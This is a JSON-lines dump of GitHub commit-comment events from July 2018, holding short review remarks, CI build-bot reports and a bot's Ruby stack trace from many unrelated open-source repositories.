{"id":"7991216676","type":"CommitCommentEvent","actor":{"login":"svnayden"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29769601,"position":8,"line":8,"path":"src/main/java/htsjdk/utils/convertorToDatabase/Baracode.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-19T19:40:14Z","updated_at":"2018-07-19T19:40:14Z","author_association":"OWNER","body":"может быть barcode?"}},"created_at":"2018-07-19T19:40:14Z"}
{"id":"7991217436","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29769602,"position":null,"line":null,"path":null,"commit_id":"5aed00ce594da09cbe4854fc5ad1641917dc2c58","created_at":"2018-07-19T19:40:24Z","updated_at":"2018-07-19T19:40:24Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2981 of 2984 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 2 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: Table big diffs.\n * 2 tests had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 640\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-19T19:40:24Z"}
{"id":"7991221422","type":"CommitCommentEvent","actor":{"login":"asottile"},"repo":{"name":"jumanjihouse/autostager"},"payload":{"comment":{"id":29769610,"position":13,"line":52,"path":".pre-commit-config.yaml","commit_id":"f50e61533ceb7d73abe00c2049a4e89f67baf38b","created_at":"2018-07-19T19:41:16Z","updated_at":"2018-07-19T19:41:16Z","author_association":"NONE","body":"maybe `pass_filenames: false`?"}},"created_at":"2018-07-19T19:41:16Z"}
{"id":"7991221467","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"proshin-roman/blog"},"payload":{"comment":{"id":29769611,"position":null,"line":null,"path":null,"commit_id":"b9e28717c587678c4998ac6293f139f60cf32089","created_at":"2018-07-19T19:41:16Z","updated_at":"2018-07-19T19:41:16Z","author_association":"NONE","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> no implicit conversion of String into Integer\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nTypeError\nno implicit conversion of String into Integer\n/app/objects/job.rb:39:in `dig'\n/app/objects/job.rb:39:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-19T19:41:16Z"}
{"id":"7991225390","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29769615,"position":22,"line":78,"path":"otus-business/src/main/java/br/org/otus/laboratory/participant/api/ParticipantLaboratoryFacade.java","commit_id":"9960161b0307c4ef06c33d961ca01bce61d653e8","created_at":"2018-07-19T19:42:08Z","updated_at":"2018-07-19T19:42:08Z","author_association":"MEMBER","body":"Removido."}},"created_at":"2018-07-19T19:42:08Z"}
{"id":"7991227898","type":"CommitCommentEvent","actor":{"login":"kiliak"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29769621,"position":null,"line":null,"path":null,"commit_id":"07250427529f831120065057f7d5265f7763bb18","created_at":"2018-07-19T19:42:40Z","updated_at":"2018-07-19T19:42:40Z","author_association":"CONTRIBUTOR","body":"Rectifié, mais je suis pas satisfait de certaines tournures de phrase, j'ai peut être trop collé au texte d'origine."}},"created_at":"2018-07-19T19:42:40Z"}
{"id":"7991235245","type":"CommitCommentEvent","actor":{"login":"ItaloBC"},"repo":{"name":"twbs/bootstrap"},"payload":{"comment":{"id":29769643,"position":null,"line":null,"path":null,"commit_id":"77178dfd57d7ebf5f46933850f20b2f3a0713978","created_at":"2018-07-19T19:44:20Z","updated_at":"2018-07-19T19:44:20Z","author_association":"NONE","body":"@Johann-S \r\n![image](https://media0.giphy.com/media/xTiN0CNHgoRf1Ha7CM/giphy.gif)\r\n"}},"created_at":"2018-07-19T19:44:20Z"}
{"id":"7991236895","type":"CommitCommentEvent","actor":{"login":"pawarsagar1990"},"repo":{"name":"pawarsagar1990/Radhe300512"},"payload":{"comment":{"id":29769648,"position":null,"line":null,"path":null,"commit_id":"e7332085b793c9bd80ae1bfefbb3f0c1ea32740f","created_at":"2018-07-19T19:44:42Z","updated_at":"2018-07-19T19:44:42Z","author_association":"OWNER","body":"sagar"}},"created_at":"2018-07-19T19:44:42Z"}
{"id":"7991241085","type":"CommitCommentEvent","actor":{"login":"lognaturel"},"repo":{"name":"enketo/enketo-xslt"},"payload":{"comment":{"id":29769660,"position":10,"line":573,"path":"xsl/openrosa2html5form.xsl","commit_id":"64bca54f7f944790667660c7dff6a3ec52438691","created_at":"2018-07-19T19:45:38Z","updated_at":"2018-07-19T19:45:38Z","author_association":"NONE","body":"Quick note from the Collect implementation -- I think this will fail if there's a choice filter with a function with more than one argument (e.g. `selected`)."}},"created_at":"2018-07-19T19:45:38Z"}
{"id":"7991242138","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29769662,"position":null,"line":null,"path":null,"commit_id":"5aed00ce594da09cbe4854fc5ad1641917dc2c58","created_at":"2018-07-19T19:45:52Z","updated_at":"2018-07-19T19:45:52Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-19T19:45:52Z"}
{"id":"7991243808","type":"CommitCommentEvent","actor":{"login":"oliuz"},"repo":{"name":"pierobot/mangapie"},"payload":{"comment":{"id":29769663,"position":null,"line":null,"path":null,"commit_id":"bde57a0f62b9c297665caac982c0c7ccff91e056","created_at":"2018-07-19T19:46:12Z","updated_at":"2018-07-19T19:46:12Z","author_association":"NONE","body":"Hi and Thank you for response\r\nI have tried to download it in windows and I can not find the way to download this module \"inotify\"."}},"created_at":"2018-07-19T19:46:12Z"}
{"id":"7991245629","type":"CommitCommentEvent","actor":{"login":"kiliak"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29769665,"position":null,"line":null,"path":null,"commit_id":"8adc2b9728b7a2d2dfff3d90e4ddf1de94335bdf","created_at":"2018-07-19T19:46:33Z","updated_at":"2018-07-19T19:46:33Z","author_association":"CONTRIBUTOR","body":"Tu as été plus rapide que moi :)"}},"created_at":"2018-07-19T19:46:33Z"}
{"id":"7991246348","type":"CommitCommentEvent","actor":{"login":"boundir"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29769667,"position":null,"line":null,"path":null,"commit_id":"07250427529f831120065057f7d5265f7763bb18","created_at":"2018-07-19T19:46:42Z","updated_at":"2018-07-19T19:46:42Z","author_association":"CONTRIBUTOR","body":"On peut voir le projet en plusieurs étapes. Une première qui consiste à combler les vides (TODO), une deuxième pour la relecture et les ajustements de taille etc...\r\n\r\nJ'ai repoussé une modif avec le texte en anglais complet. Pour que tout le monde ait les éléments pour proposer une traduction."}},"created_at":"2018-07-19T19:46:42Z"}
{"id":"7991249006","type":"CommitCommentEvent","actor":{"login":"CodingBobby"},"repo":{"name":"Bumbleboss/bumbleboss.github.io"},"payload":{"comment":{"id":29769669,"position":null,"line":null,"path":null,"commit_id":"bcc36c8209d4937ab23f03e47f7afb513b56b5ef","created_at":"2018-07-19T19:47:14Z","updated_at":"2018-07-19T19:47:14Z","author_association":"COLLABORATOR","body":"hey thats me!!!1"}},"created_at":"2018-07-19T19:47:14Z"}
{"id":"7991249983","type":"CommitCommentEvent","actor":{"login":"lrennels"},"repo":{"name":"fund-model/fund"},"payload":{"comment":{"id":29769671,"position":null,"line":null,"path":null,"commit_id":"ded0ef74e6da84ffae0b10c080c9a57684f06268","created_at":"2018-07-19T19:47:26Z","updated_at":"2018-07-19T19:47:26Z","author_association":"NONE","body":"@ckingdon95 the fund module exports FUND, So this shouldn’t be necessary.  It’s fine this way, I’d like to avoid too many small extra commits to this main branch on the fork (it’s getting so bugnim trying to move towards small task based branches) but just FYI it works either way!"}},"created_at":"2018-07-19T19:47:26Z"}
{"id":"7991250395","type":"CommitCommentEvent","actor":{"login":"ry"},"repo":{"name":"ry/deno"},"payload":{"comment":{"id":29769672,"position":34,"line":28,"path":"build_extra/rust/rust.gni","commit_id":"521ca99c55370bc4bcef8f93d2eca35ccadbefca","created_at":"2018-07-19T19:47:30Z","updated_at":"2018-07-19T19:47:30Z","author_association":"OWNER","body":"I think you can just say \"see comment at top of get_rust_ldflags.py\""}},"created_at":"2018-07-19T19:47:30Z"}
{"id":"7991252150","type":"CommitCommentEvent","actor":{"login":"ry"},"repo":{"name":"ry/deno"},"payload":{"comment":{"id":29769678,"position":24,"line":18,"path":"build_extra/rust/rust.gni","commit_id":"521ca99c55370bc4bcef8f93d2eca35ccadbefca","created_at":"2018-07-19T19:47:54Z","updated_at":"2018-07-19T19:47:54Z","author_association":"OWNER","body":"We could have an official \"why gn\" somewhere and just link to it... but no need to now.."}},"created_at":"2018-07-19T19:47:54Z"}
{"id":"7991253334","type":"CommitCommentEvent","actor":{"login":"LiNk-NY"},"repo":{"name":"Bioconductor/BiocWorkshops"},"payload":{"comment":{"id":29769681,"position":null,"line":null,"path":null,"commit_id":"83232692d8528bb60522731820c8ce17fd284e87","created_at":"2018-07-19T19:48:09Z","updated_at":"2018-07-19T19:48:09Z","author_association":"COLLABORATOR","body":"I removed this chunk because I wasn't sure how it was interacting with `_common.R` but you can add `cache.lazy = FALSE` to avoid that error (if present)."}},"created_at":"2018-07-19T19:48:09Z"}
{"id":"7991259242","type":"CommitCommentEvent","actor":{"login":"Zolmeister"},"repo":{"name":"thysultan/dio.js"},"payload":{"comment":{"id":29769691,"position":26,"line":153,"path":"src/Core/Commit.js","commit_id":"73b18c3ce7b33b4a5d23e4b35f5d3b787284a7db","created_at":"2018-07-19T19:49:24Z","updated_at":"2018-07-19T19:49:24Z","author_association":"NONE","body":"why is a `try` block necessary here?"}},"created_at":"2018-07-19T19:49:24Z"}
{"id":"7991259491","type":"CommitCommentEvent","actor":{"login":"timgraham"},"repo":{"name":"django/django"},"payload":{"comment":{"id":29769692,"position":5,"line":79,"path":"docs/topics/db/examples/many_to_one.txt","commit_id":"9d7e2c7b447b2bbabe746770ebd26465cc564f05","created_at":"2018-07-19T19:49:28Z","updated_at":"2018-07-19T19:49:28Z","author_association":"MEMBER","body":"Thanks for the report. Fixed in 6b6bdfe25c946ee9512b3866d64930fe1be619fd. In the future, please report bugs on the [ticket tracker](https://code.djangoproject.com/)."}},"created_at":"2018-07-19T19:49:28Z"}
{"id":"7991259955","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29769694,"position":35,"line":38,"path":"otus/app/module/laboratory/business/participant/aliquot/aliquot-messages-service.js","commit_id":"7c090d5b7be5720e702f8d1420cf7edfa58017e0","created_at":"2018-07-19T19:49:34Z","updated_at":"2018-07-19T19:49:34Z","author_association":"MEMBER","body":"já havia sido alterado"}},"created_at":"2018-07-19T19:49:34Z"}
{"id":"7991261076","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29769696,"position":185,"line":160,"path":"otus/app/module/laboratory/business/participant/aliquot/aliquot-manager/moment-type-manager-factory.js","commit_id":"7c090d5b7be5720e702f8d1420cf7edfa58017e0","created_at":"2018-07-19T19:49:48Z","updated_at":"2018-07-19T19:49:48Z","author_association":"MEMBER","body":"Corrigido"}},"created_at":"2018-07-19T19:49:48Z"}
{"id":"7991263286","type":"CommitCommentEvent","actor":{"login":"DZbug"},"repo":{"name":"vladislawovk/bootstrap4"},"payload":{"comment":{"id":29769699,"position":32,"line":32,"path":"index.html","commit_id":"c684918e0eac42e7b68203a546b05e6ab4597d1b","created_at":"2018-07-19T19:50:18Z","updated_at":"2018-07-19T19:50:18Z","author_association":"NONE","body":"Good job!"}},"created_at":"2018-07-19T19:50:18Z"}
{"id":"7991264120","type":"CommitCommentEvent","actor":{"login":"MartijnR"},"repo":{"name":"enketo/enketo-xslt"},"payload":{"comment":{"id":29769702,"position":10,"line":573,"path":"xsl/openrosa2html5form.xsl","commit_id":"64bca54f7f944790667660c7dff6a3ec52438691","created_at":"2018-07-19T19:50:29Z","updated_at":"2018-07-19T19:50:29Z","author_association":"MEMBER","body":"Ah right. It's a terrible technique. Thanks a lot!!"}},"created_at":"2018-07-19T19:50:29Z"}
{"id":"7991265110","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29769706,"position":null,"line":null,"path":null,"commit_id":"1a9e3a0e563c4afe49cd383a86908ec3500feeed","created_at":"2018-07-19T19:50:42Z","updated_at":"2018-07-19T19:50:42Z","author_association":"OWNER","body":"Should fix https://github.com/romanz/electrs/issues/11#issuecomment-406262145"}},"created_at":"2018-07-19T19:50:42Z"}
{"id":"7991265383","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29769707,"position":156,"line":139,"path":"otus/app/module/laboratory/business/participant/aliquot/aliquot-manager/moment-type-manager-factory.js","commit_id":"7c090d5b7be5720e702f8d1420cf7edfa58017e0","created_at":"2018-07-19T19:50:46Z","updated_at":"2018-07-19T19:50:46Z","author_association":"MEMBER","body":"Corrigido"}},"created_at":"2018-07-19T19:50:46Z"}
{"id":"7991266691","type":"CommitCommentEvent","actor":{"login":"benjaminapetersen"},"repo":{"name":"benjaminapetersen/js-lunch-and-learn"},"payload":{"comment":{"id":29769709,"position":null,"line":null,"path":null,"commit_id":"62e032f5d1707356a66dce62d323ea3ebba70fda","created_at":"2018-07-19T19:51:05Z","updated_at":"2018-07-19T19:51:05Z","author_association":"OWNER","body":"@rhamilto @sg00dwin @jgiardino here is what was done today.\r\n\r\nSpecifically the [todo item](https://github.com/benjaminapetersen/js-lunch-and-learn/commit/62e032f5d1707356a66dce62d323ea3ebba70fda#diff-80a13bdd162956b1a77a2e2980466849), updated to take a few event handlers, so that we can respond to user clicks on all of our buttons. \r\n\r\n![screen shot 2018-07-19 at 3 50 42 pm](https://user-images.githubusercontent.com/280512/42966550-885a2eb8-8b6b-11e8-856d-7d6d57ee3041.png)\r\n\r\n\r\n"}},"created_at":"2018-07-19T19:51:05Z"}
{"id":"7991267301","type":"CommitCommentEvent","actor":{"login":"johnarleycano"},"repo":{"name":"johnarleycano/incidentes"},"payload":{"comment":{"id":29769714,"position":null,"line":null,"path":null,"commit_id":"a25281bdb75a89df97686715f1274b7c7e2661f1","created_at":"2018-07-19T19:51:13Z","updated_at":"2018-07-19T19:51:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[Incidentes] feat(Registro SOS): Nuevos campos](https://trello.com/c/dc9uZ9Gn/13-incidentes-featregistro-sos-nuevos-campos)"}},"created_at":"2018-07-19T19:51:13Z"}
{"id":"7991268239","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29769716,"position":27,"line":27,"path":"otus/app/module/laboratory/business/participant/aliquot/aliquot-structure-factory.js","commit_id":"7c090d5b7be5720e702f8d1420cf7edfa58017e0","created_at":"2018-07-19T19:51:25Z","updated_at":"2018-07-19T19:51:25Z","author_association":"MEMBER","body":"removido"}},"created_at":"2018-07-19T19:51:25Z"}
{"id":"7991268555","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29769718,"position":null,"line":null,"path":null,"commit_id":"ba1762d2408bb7540b20fb529a86858f2e337520","created_at":"2018-07-19T19:51:28Z","updated_at":"2018-07-19T19:51:28Z","author_association":"OWNER","body":"Fixes #31 "}},"created_at":"2018-07-19T19:51:28Z"}
{"id":"7991268708","type":"CommitCommentEvent","actor":{"login":"pierobot"},"repo":{"name":"pierobot/mangapie"},"payload":{"comment":{"id":29769720,"position":null,"line":null,"path":null,"commit_id":"bde57a0f62b9c297665caac982c0c7ccff91e056","created_at":"2018-07-19T19:51:30Z","updated_at":"2018-07-19T19:51:30Z","author_association":"OWNER","body":"inotify is only available in linux.\r\nYou will have to manually rescan your libraries for now.\r\nYou can do this in the admin/libraries page or by running ``php artisan mangapie:scan``.\r\n\r\nThe automatic sheduled scan will be enabled again after I finish working on these branches."}},"created_at":"2018-07-19T19:51:30Z"}
{"id":"7991268915","type":"CommitCommentEvent","actor":{"login":"zackkatz"},"repo":{"name":"gravityview/GravityView"},"payload":{"comment":{"id":29769721,"position":78,"line":1617,"path":"tests/unit-tests/GravityView_Future_Test.php","commit_id":"a901f7741f7dea6c4a87114753a19fc291d5b874","created_at":"2018-07-19T19:51:33Z","updated_at":"2018-07-19T19:51:33Z","author_association":"MEMBER","body":"Whoops, I meant to!"}},"created_at":"2018-07-19T19:51:33Z"}
{"id":"7991273537","type":"CommitCommentEvent","actor":{"login":"andylokandy"},"repo":{"name":"dcao/elba"},"payload":{"comment":{"id":29769726,"position":null,"line":null,"path":null,"commit_id":"20c02a42de5e9e8cdf220e13d92b7de632194745","created_at":"2018-07-19T19:52:34Z","updated_at":"2018-07-19T19:52:34Z","author_association":"CONTRIBUTOR","body":"Test under window seems to be broken."}},"created_at":"2018-07-19T19:52:34Z"}
{"id":"7991274353","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29769728,"position":19,"line":63,"path":"otus/app/module/laboratory/business/participant/aliquot/aliquot-messages-service.js","commit_id":"7739fa9187f0ba64b2a4b69427d5ee81c26e01f5","created_at":"2018-07-19T19:52:44Z","updated_at":"2018-07-19T19:52:44Z","author_association":"MEMBER","body":"Alterado"}},"created_at":"2018-07-19T19:52:44Z"}
{"id":"7991274908","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29769730,"position":24,"line":67,"path":"otus/app/module/laboratory/business/participant/aliquot/aliquot-messages-service.js","commit_id":"7739fa9187f0ba64b2a4b69427d5ee81c26e01f5","created_at":"2018-07-19T19:52:51Z","updated_at":"2018-07-19T19:52:51Z","author_association":"MEMBER","body":"idem"}},"created_at":"2018-07-19T19:52:51Z"}
{"id":"7991275842","type":"CommitCommentEvent","actor":{"login":"moeadham"},"repo":{"name":"vedidev/ethereum-payments"},"payload":{"comment":{"id":29769732,"position":null,"line":null,"path":null,"commit_id":"bdb69349a5631fe2dc0e4ab3e304611372c4366a","created_at":"2018-07-19T19:53:03Z","updated_at":"2018-07-19T19:53:03Z","author_association":"NONE","body":"Feel free to submit a PR to the main repo 👍 "}},"created_at":"2018-07-19T19:53:03Z"}
{"id":"7991279720","type":"CommitCommentEvent","actor":{"login":"var-const"},"repo":{"name":"firebase/firebase-ios-sdk"},"payload":{"comment":{"id":29769737,"position":5,"line":70,"path":"Firestore/Example/FuzzTests/FSTFuzzTestsPrincipal.mm","commit_id":"59997fac67799b264546add125d52074fcad8ff1","created_at":"2018-07-19T19:53:51Z","updated_at":"2018-07-19T19:53:51Z","author_association":"COLLABORATOR","body":"Pointers also implicitly convert to `bool` in conditionals, so this can be `if (!fuzzing_target_env)`. Whether or not this is preferable to explicitly comparing to `nullptr` is a matter of taste. No action required, just mentioning it so you know."}},"created_at":"2018-07-19T19:53:51Z"}
{"id":"7991280168","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29769738,"position":12,"line":100,"path":"otus/app/ux-component/laboratory/control-panel/control-panel-component.js","commit_id":"7c090d5b7be5720e702f8d1420cf7edfa58017e0","created_at":"2018-07-19T19:53:58Z","updated_at":"2018-07-19T19:53:58Z","author_association":"MEMBER","body":"não está mais"}},"created_at":"2018-07-19T19:53:58Z"}
{"id":"7991284246","type":"CommitCommentEvent","actor":{"login":"vlsi"},"repo":{"name":"pgjdbc/pgjdbc"},"payload":{"comment":{"id":29769743,"position":5,"line":8,"path":"CHANGELOG.md","commit_id":"2c9240d87c51b393e8054dda6a74b0df97d1c86c","created_at":"2018-07-19T19:54:49Z","updated_at":"2018-07-19T19:54:49Z","author_association":"MEMBER","body":"`s/HostRequirement/targetServerType/`\r\n`HostRequirement` is not visible to the end-users, and `targetServerType` is."}},"created_at":"2018-07-19T19:54:49Z"}
{"id":"7991285658","type":"CommitCommentEvent","actor":{"login":"var-const"},"repo":{"name":"firebase/firebase-ios-sdk"},"payload":{"comment":{"id":29769745,"position":12,"line":76,"path":"Firestore/Example/FuzzTests/FSTFuzzTestsPrincipal.mm","commit_id":"59997fac67799b264546add125d52074fcad8ff1","created_at":"2018-07-19T19:55:07Z","updated_at":"2018-07-19T19:55:07Z","author_association":"COLLABORATOR","body":"Nit: the latter part of the comment seems extraneous."}},"created_at":"2018-07-19T19:55:07Z"}
{"id":"7991287814","type":"CommitCommentEvent","actor":{"login":"var-const"},"repo":{"name":"firebase/firebase-ios-sdk"},"payload":{"comment":{"id":29769748,"position":14,"line":78,"path":"Firestore/Example/FuzzTests/FSTFuzzTestsPrincipal.mm","commit_id":"59997fac67799b264546add125d52074fcad8ff1","created_at":"2018-07-19T19:55:33Z","updated_at":"2018-07-19T19:55:33Z","author_association":"COLLABORATOR","body":"Nit: this would be a little cleaner as `if (fuzzing_target.empty())`."}},"created_at":"2018-07-19T19:55:33Z"}
{"id":"7991289827","type":"CommitCommentEvent","actor":{"login":"Zolmeister"},"repo":{"name":"thysultan/dio.js"},"payload":{"comment":{"id":29769751,"position":23,"line":584,"path":"test/Render.spec.js","commit_id":"73b18c3ce7b33b4a5d23e4b35f5d3b787284a7db","created_at":"2018-07-19T19:55:56Z","updated_at":"2018-07-19T19:55:56Z","author_association":"NONE","body":"These tests don't really show `setAttribute(xxx)` vs `.form = xxx`\r\na deeper hook is necessary"}},"created_at":"2018-07-19T19:55:56Z"}
{"id":"7991290077","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29769753,"position":null,"line":null,"path":null,"commit_id":"5743cd7092c69ab2a724a3c02c65fd806e2a10bd","created_at":"2018-07-19T19:55:59Z","updated_at":"2018-07-19T19:55:59Z","author_association":"CONTRIBUTOR","body":"You broke it :(\r\n\r\n![capture](https://user-images.githubusercontent.com/31389848/42966787-210e957a-8b96-11e8-86d6-37e44b11417f.PNG)\r\n\r\n"}},"created_at":"2018-07-19T19:55:59Z"}
{"id":"7991291468","type":"CommitCommentEvent","actor":{"login":"thysultan"},"repo":{"name":"thysultan/dio.js"},"payload":{"comment":{"id":29769758,"position":26,"line":153,"path":"src/Core/Commit.js","commit_id":"73b18c3ce7b33b4a5d23e4b35f5d3b787284a7db","created_at":"2018-07-19T19:56:14Z","updated_at":"2018-07-19T19:56:14Z","author_association":"OWNER","body":"We want to set `element.active` to false after the inner block has executed, though since it is possible for the inner block to raise an exception when componentWillUnmount throws, we do this in the finally block to ensure it always happens after regardless."}},"created_at":"2018-07-19T19:56:14Z"}
